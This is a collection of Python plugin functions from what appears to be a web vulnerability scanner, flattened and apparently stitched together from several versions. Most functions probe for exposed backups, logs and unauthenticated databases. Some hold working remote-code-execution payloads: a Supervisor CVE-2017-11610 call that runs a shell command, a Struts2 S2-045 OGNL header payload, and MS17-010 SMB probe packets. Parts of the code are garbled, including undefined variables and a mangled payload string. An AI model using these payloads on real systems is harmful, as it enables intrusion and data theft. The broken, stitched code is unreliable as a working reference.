def do_check(self, url): if url != '/': return arg = self.host if ':9001' not in arg: domain = arg + ':9001' else: domain = arg target = 'http://' + domain + '/RPC2' try: proxy = xmlrpclib.ServerProxy(target) old = getattr(proxy, 'supervisor.readLog')(0, 0) a = random.randint(10000000, 20000000) b = random.randint(10000000, 20000000) command = 'expr ' + str(a) + ' + ' + str(b) logfile = getattr(proxy, 'supervisor.supervisord.options.logfile.strip')() getattr(proxy, 'supervisor.supervisord.options.warnings.linecache.os.system')( '{} | tee -a {}'.format(command, logfile)) result = getattr(proxy, 'supervisor.readLog')(0, 0) if result[len(old):].strip() == str(a + b): save_user_script_result( self, '', arg, '', 'CVE-2017-11610 Supervisor Remote Command Execution') except Exception as e: pass
def do_check(self, url): if url == '/' and self.conn_pool and self.lang == 'php': if self.index_status == 301 and self.index_headers.get('location', '').find('forum.php') >= 0 or \ str(self.index_headers).find('_saltkey=') > 0: url_lst = [ '/config/config_ucenter.php.bak', '/config/.config_ucenter.php.swp', '/config/.config_global.php.swp', '/config/config_global.php.1', '/uc_server/data/config.inc.php.bak', '/config/config_global.php.bak', '/include/config.inc.php.tmp' ] for _url in url_lst: status, headers, html_doc = self._http_request(_url) if status == 200 or status == 206: if html_doc.find('<?php') >= 0: save_user_script_result(self, status, self.base_url + _url, 'Discuz Backup File Found') # getcolor DOM XSS status, headers, html_doc = self._http_request( '/static/image/admincp/getcolor.htm') if html_doc.find("if(fun) eval('parent.'+fun+'") > 0: save_user_script_result( self, status, self.base_url + '/static/image/admincp/getcolor.htm', 'Discuz getcolor DOM XSS')
def do_check(self, url): if not self.conn_pool: return extensions = [ '.zip', '.rar', '.tar.gz', '.tar.bz2', '.tgz', '.7z', '.log', '.sql' ] if url == '/' and self.domain_sub: file_names = [self.host.split(':')[0], self.domain_sub] for name in file_names: for ext in extensions: status, headers, html_doc = self.http_request('/' + name + ext) if status == 206 and \ (self.has_status_404 or headers.get('content-type', '').find('application/') >= 0) or \ (ext == '.sql' and html_doc.find("CREATE TABLE") >= 0): save_user_script_result(self, status, self.base_url + '/' + name + ext, '', 'Compressed File') elif url != '/': # sub folders like /aaa/bbb/ folder_name = url.split('/')[-2] if len(folder_name) >= 4: url_prefix = url[:-len(folder_name) - 1] for ext in extensions: status, headers, html_doc = self.http_request(url_prefix + folder_name + ext) if status == 206 and headers.get('content-type', '').find('application/') >= 0: save_user_script_result( self, status, self.base_url + url_prefix + folder_name + ext, '', 'Compressed File')
def do_check(self, url): if url != '/': return ip = self.host.split(':')[0] if execute(ip, 'ifconfig'): save_user_script_result(self, '', 'http://%s:9200/_search?pretty' % ip, 'ElasticSearch Groovy remote code exec CVE-2015-1427')
def do_check(self, url): if url != '/': return ip = self.host.split(':')[0] ports_open = is_port_open(ip) headers = { "User-Agent": "BugScan plugins http_proxy v0.1", "Connection": "close" } for port in ports_open: proxy_url = "http://{}:{}".format(ip, port) proxy = {"http": proxy_url, "https": proxy_url} try: _ = requests.get('http://weibo.com/robots.txt', headers=headers, proxies=proxy, timeout=10.0) code = _.status_code html = _.text if code == 200 and html.find("http://weibo.com/sitemap.xml") >= 0: save_user_script_result(self, '', '%s:%s' % (ip, port), 'HTTP Proxy Found') except Exception as e: pass
def do_check(self, url): if url != '/': return host = self.host.split(':')[0] ret, txt = test_fastcgi(host) if ret: save_user_script_result(self, '', host + ':9000', 'Fastcgi Remote Code Execution Vulnerability')
def do_check(self, url): if not self.conn_pool: return extensions = ['.zip', '.rar', '.tar.gz', '.tar.bz2', '.tgz', '.7z', '.log'] if url == '/' and self.domain_sub: file_names = [self.host.split(':')[0], self.domain_sub] for name in file_names: for ext in extensions: status, headers, html_doc = self._http_request('/' + name + ext) if status == 206 and headers.get( 'content-type', '').find('application/octet-stream') >= 0: save_user_script_result(self, status, self.base_url + '/' + name + ext, 'Possible Data File Found') elif url != '/': # sub folders like /aaa/bbb/ folder_name = url.split('/')[-2] url_prefix = url[:-len(folder_name) - 1] for ext in extensions: status, headers, html_doc = self._http_request(url_prefix + folder_name + ext) if status == 206 and headers.get( 'content-type', '').find('application/octet-stream') >= 0: save_user_script_result( self, status, self.base_url + url_prefix + folder_name + ext, 'Possible Data File Found')
def do_check(self, url): if url == '/': if self.conn_pool and self.index_status in (301, 302): for keyword in ['admin', 'login', 'manage', 'backend']: if self.index_headers.get('location', '').find(keyword) >= 0: save_user_script_result(self, self.index_status, self.base_url + '/', 'Admin Site') break
def do_check(self, url): if url != '/': return ip = self.host.split(':')[0] port = 445 timeout = 5 negotiate_protocol_request = binascii.unhexlify( "00000054ff534d4272000000001801280000000000000000000000000000729c0000c4e1003100024c414e4d414e312e3000024c4d312" "e325830303200024e54204c414e4d414e20312e3000024e54204c4d20302e313200") session_setup_request = binascii.unhexlify( "0000008fff534d4273000000001801280000000000000000000000000000729c0000c4e10cff000000dfff02000100000000003100000" "00000d400008054004e544c4d5353500001000000050208a2010001002000000010001000210000002e3431426c7441314e5059746249" "55473057696e646f7773203230303020323139350057696e646f7773203230303020352e3000") try: s = socket.socket(socket.AF_INET, socket.SOCK_STREAM) s.settimeout(timeout) s.connect((ip, port)) s.send(negotiate_protocol_request) s.recv(1024) s.send(session_setup_request) data = s.recv(1024) user_id = data[32:34] session_setup_request_2 = binascii.unhexlify( "00000150ff534d4273000000001801280000000000000000000000000000729c" + binascii.hexlify( user_id) + "c4e10cff000000dfff0200010000000000f200000000005cd0008015014e544c4d535350000300000018001800" "40000000780078005800000002000200d000000000000000d200000020002000d200000000000000f200000005" "0208a2ec893eacfc70bba9afefe94ef78908d37597e0202fd6177c0dfa65ed233b731faf86b02110137dc50101" "000000000000004724eed7b8d2017597e0202fd6177c0000000002000a0056004b002d005000430001000a0056" "004b002d005000430004000a0056004b002d005000430003000a0056004b002d00500043000700080036494bf1" "d7b8d20100000000000000002e003400310042006c007400410031004e00500059007400620049005500470030" "0057696e646f7773203230303020323139350057696e646f7773203230303020352e3000") s.send(session_setup_request_2) s.recv(1024) session_setup_request_3 = binascii.unhexlify( "00000063ff534d4273000000001801200000000000000000000000000000729c0000c4e10dff000000dfff0200010000000000000" "0000000000000400000002600002e0057696e646f7773203230303020323139350057696e646f7773203230303020352e3000") s.send(session_setup_request_3) data = s.recv(1024) tree_id = data[32:34] smb = get_tree_connect_request(ip, tree_id) s.send(smb) s.recv(1024) poc = binascii.unhexlify( "0000004aff534d422500000000180128000000000000000000000000" + binascii.hexlify( user_id) + "729c" + binascii.hexlify( tree_id) + "c4e11000000000ffffffff0000000000000000000000004a0000004a0002002300000007005c504950455c00") s.send(poc) data = s.recv(1024) s.close() if "\x05\x02\x00\xc0" in data: save_user_script_result(self, '', ip + ':445', '', 'MS17010 SMB Remote Code Execution') except Exception as e: return False
def do_check(self, url): if url == '/' and self.conn_pool and self.lang == 'php': url_lst = ['/zabbix/jsrpc.php', '/jsrpc.php'] for _url in url_lst: status, headers, html_doc = self._http_request(_url) if status == 200 or status == 206: u = _url + payload status, headers, html_doc = self._http_request(_url) if mark in html_doc: save_user_script_result(self, status, self.base_url + u, 'Zabbix jsrpc SQLi Found') break
def do_check(self, url): if url == '/' and self.conn_pool: if self.index_status == 302 and self.index_headers.get( 'location', '').lower() == 'https://%s/owa' % self.host: save_user_script_result(self, 302, 'https://%s' % self.host, 'OutLook Web APP Found') return status, headers, html_doc = self.http_request('/ews/') if status == 302: redirect_url = headers.get('location', '') if redirect_url == 'https://%shttp://%s/ews/' % (self.host, self.host): save_user_script_result(self, 302, 'https://%s' % self.host, 'OutLook Web APP Found') return if redirect_url == 'https://%s/ews/' % self.host: try: conn = httplib.HTTPSConnection(self.host) conn.request('HEAD', '/ews') if conn.getresponse().status == 401: save_user_script_result(self, 401, redirect_url, 'OutLook Web APP Found') conn.close() except Exception as e: pass return elif status == 401: if headers.get('Server', '').find('Microsoft-IIS') >= 0: save_user_script_result(self, 401, self.base_url + '/ews/', 'OutLook Web APP Found') return
def do_check(self, url): if not self.conn_pool: return url = "" for a in self.index_a_urls: if a.endswith('.action') or a.endswith('.do'): url = a break if not url: return cmd = 'env' headers = {} headers['User-Agent'] = "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_12_3) " \ "AppleWebKit/537.36 (KHTML, like Gecko) Chrome/56.0.2924.87 Safari/537.36" headers['Content-Type'] = "%{(#nike='multipart/form-data').(#[email protected]@DEFAULT_MEMBER_ACCESS)." \ "(#_memberAccess?(#_memberAccess=#dm):" \ "((#container=#context['com.opensymphony.xwork2.ActionContext.container'])." \ "(#ognlUtil=#container.getInstance" \ "(@com.opensymphony.xwork2.ognl.OgnlUtil@class))." \ "(#ognlUtil.getExcludedPackageNames().clear())." \ "(#ognlUtil.getExcludedClasses().clear())." \ "(#context.setMemberAccess(#dm))))." \ "(#cmd='" + \ cmd + \ "')." \ "(#iswin=(@java.lang.System@getProperty('os.name').toLowerCase()." \ "contains('win')))." \ "(#cmds=(#iswin?{'cmd.exe','/c',#cmd}:{'/bin/bash','-c',#cmd}))." \ "(#p=new java.lang.ProcessBuilder(#cmds))." \ "(#p.redirectErrorStream(true)).(#process=#p.start())." \ "(#ros=(@org.apache.struts2.ServletActionContext@getResponse()." \ "getOutputStream()))." \ "(@org.apache.commons.io.IOUtils@copy(#process.getInputStream(),#ros))." \ "(#ros.flush())}" data = '--40a1f31a0ec74efaa46d53e9f4311353\r\n' \ 'Content-Disposition: form-data; name="image1"\r\n' \ 'Content-Type: text/plain; charset=utf-8\r\n\r\ntest\r\n--40a1f31a0ec74efaa46d53e9f4311353--\r\n' try: html = self.conn_pool.urlopen(method='POST', url=self.base_url + '/' + url, body=data, headers=headers, retries=1).data if html.find('LOGNAME=') >= 0: save_user_script_result(self, '', self.base_url + '/' + url, 'Struts2 s02-45 Remote Code Execution') except Exception as e: pass
def do_check(self, url): if url == '/' and self.conn_pool: if self.index_html_doc.find('/wp-content/themes/') >= 0: url_lst = [ '/wp-config.php.inc', '/wp-config.inc', '/wp-config.bak', '/wp-config.php~', '/.wp-config.php.swp', '/wp-config.php.bak' ] for _url in url_lst: status, headers, html_doc = self._http_request(_url) print _url if status == 200 or status == 206: if html_doc.find('<?php') >= 0: save_user_script_result(self, status, self.base_url + _url, 'WordPress Backup File Found')
def do_check(self, url): if url != '/': return try: ip = self.host.split(':')[0] conn = pymongo.MongoClient(host=ip, port=27017) database_list = conn.database_names() if not database_list: conn.close() return detail = "%s MongoDB Unauthorized Access : %s" % (ip, ",".join(database_list)) conn.close() save_user_script_result(self, '', 'mongodb://%s:27017' % ip, detail) except Exception as e: pass
def do_check(self, url): if url != '/': return ip = self.host.split(':')[0] try: socket.setdefaulttimeout(5) s = socket.socket(socket.AF_INET, socket.SOCK_STREAM) s.connect((ip, 2181)) s.send('envi') data = s.recv(1024) if 'Environment' in data: save_user_script_result(self, '', 'zookeeper://%s:2181' % ip, '', 'Zookeeper Unauthorized Access') except Exception as e: pass finally: s.close()
def do_check(self, url): if url != '/': return s = socket.socket(socket.AF_INET, socket.SOCK_STREAM) s.settimeout(3) try: host = self.host.split(':')[0] s.connect((host, 6379)) payload = '\x2a\x31\x0d\x0a\x24\x34\x0d\x0a\x69\x6e\x66\x6f\x0d\x0a' s.send(payload) data = s.recv(1024) s.close() if "redis_version" in data: save_user_script_result(self, '', 'redis://' + host + ':6379', 'Redis Unauthorized Access') except Exception as e: s.close()
def do_check(self, url): if url != '/' or not self.conn_pool or self._404_status == 301: return _folders = folders.split() for _url in _folders: status, headers, html_doc = self._http_request(_url) if status in (301, 302): location = headers.get('location', '') if location.startswith(self.base_url + _url + '/') or location.startswith(_url + '/'): save_user_script_result(self, status, self.base_url + _url, 'Possible Sensitive Folder Found') if status == 206 and self._404_status != 206: save_user_script_result(self, status, self.base_url + _url, 'Possible Sensitive File Found')
def do_check(self, url): if url == '/' and self.conn_pool and not self.rewrite: folders = [''] for log_folder in [ 'log', 'logs', '_log', '_logs', 'access-log', 'errorlog' ]: status, headers, html_doc = self._http_request('/' + log_folder) if status in (301, 302): location = headers.get('location', '') if location.startswith(self.base_url + '/' + log_folder + '/') or \ location.startswith('/' + log_folder + '/'): folders.append(log_folder) if status == 206 and self._404_status != 206: save_user_script_result(self, status, self.base_url + '/' + log_folder, 'Log File Found') url_lst = [ 'access.log', 'www.log', 'error.log', 'log.log', 'sql.log', 'errors.log', 'debug.log', 'db.log', 'install.log', 'server.log', 'sqlnet.log', 'WS_FTP.log', 'database.log', 'data.log', 'app.log', '/log.tar.gz', '/log.rar', '/log.zip', '/log.tgz', '/log.tar.bz2', '/log.7z' ] for log_folder in folders: for _url in url_lst: status, headers, html_doc = self._http_request('/' + log_folder + '/' + _url) # print '/' + log_folder + '/' + _url if headers.get('content-type', '').find('image') >= 0: continue if status == 206 and headers.get( 'content-type', '').find('application/octet-stream') >= 0: save_user_script_result( self, status, self.base_url + '/' + log_folder + '/' + _url, 'Log File Found') for log_folder in folders: for _url in ['log.txt', 'logs.txt']: status, headers, html_doc = self._http_request('/' + log_folder + '/' + _url) # print '/' + log_folder + '/' + _url if status == 206 and headers.get('content-type', '').find('text/plain') >= 0: save_user_script_result( self, status, self.base_url + '/' + log_folder + '/' + _url, 'Log File Found')
def do_check(self, url): if url == '/' and self.conn_pool: folders = [''] for log_folder in [ 'log', 'logs', '_log', '_logs', 'accesslog', 'errorlog' ]: status, headers, html_doc = self.http_request('/' + log_folder) if status in (301, 302): location = headers.get('location', '') if location.startswith(self.base_url + '/' + log_folder + '/') or \ location.startswith('/' + log_folder + '/'): folders.append(log_folder) self.enqueue(log_folder) self.crawl('/' + log_folder + '/') if status == 206 and self._404_status != 206: save_user_script_result(self, status, self.base_url + '/' + log_folder, '', 'Log File Found') url_lst = [ 'access.log', 'www.log', 'error.log', 'log.log', 'sql.log', 'errors.log', 'debug.log', 'db.log', 'install.log', 'server.log', 'sqlnet.log', 'WS_FTP.log', 'database.log', 'data.log', 'app.log', 'log.tar.gz', 'log.rar', 'log.zip', 'log.tgz', 'log.tar.bz2', 'log.7z' ] for log_folder in folders: for _url in url_lst: url_prefix = '/' + log_folder if log_folder else '' status, headers, html_doc = self.http_request(url_prefix + '/' + _url) # print '/' + log_folder + '/' + _url if status == 206 and \ (self.has_status_404 or headers.get('content-type', '').find('application/') >= 0): save_user_script_result( self, status, self.base_url + url_prefix + '/' + _url, '', 'Log File') for log_folder in folders: for _url in ['log.txt', 'logs.txt']: url_prefix = '/' + log_folder if log_folder else '' status, headers, html_doc = self.http_request(url_prefix + '/' + _url) # print '/' + log_folder + '/' + _url if status == 206 and headers.get('content-type', '').find('text/plain') >= 0: save_user_script_result( self, status, self.base_url + url_prefix + '/' + _url, '', 'Log File')